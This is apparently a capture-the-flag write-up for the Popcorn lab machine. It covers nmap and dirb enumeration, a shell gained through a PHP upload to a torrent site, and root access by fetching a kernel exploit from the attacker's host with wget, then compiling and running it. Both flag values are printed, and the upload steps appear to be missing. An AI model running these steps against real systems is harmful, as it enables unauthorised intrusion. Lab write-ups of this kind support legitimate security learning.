POPCORN 10.10.10.6 Write Up
Machine Created by ch4pTools Used for Enumeration:
1. nmap2. dirb
Tools Used for Exploitation:
1. netcatSteps for primary enumeration:
1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the popcorn box we can see, open ports and services are, port 22 for ssh and port 80 for http server.Command used: nmap -A 10.10.10.6
2. Port 22 ssh looks updated version. Running dirb on port 80 gives some directories. one of them looks interesting. http://10.10.10.6/torrent/
Command used: dirb http://10.10.10.6
Steps to get user.txt:
1.Register on http://10.10.10.6/torrent/users/index.php?mode=register with any username password and login.
4. Goto upload directory http://10.10.10.6/torrent/upload/ got from dirb result and click on the uploaded php to get shell.
Use command cat /home/george/user.txt to print user flag.
Steps to get root.txt:
1.Typing uname -a gives that kernel version of the machine is vulnerable. exploit link: https://www.exploit-db.com/exploits/157042. Start python server to host the exploit using command "python3 -m http.server 1337" and download it on the machine using "wget http://10.10.14.5/15704.c" command.
3. Now convert the file into executable with "gcc 15704.c -o exploit" and "chmod 777 exploit". Now run the exploit with command "./exploit" and get the root flag using command "cat /root/root.txt.
Flags:
1. user.txt flag: 5e36a919398ecc5d5c110f2d865cf1362. root.txt flag: f122331023a9393319a0370129fd9b14
No comments:
Post a Comment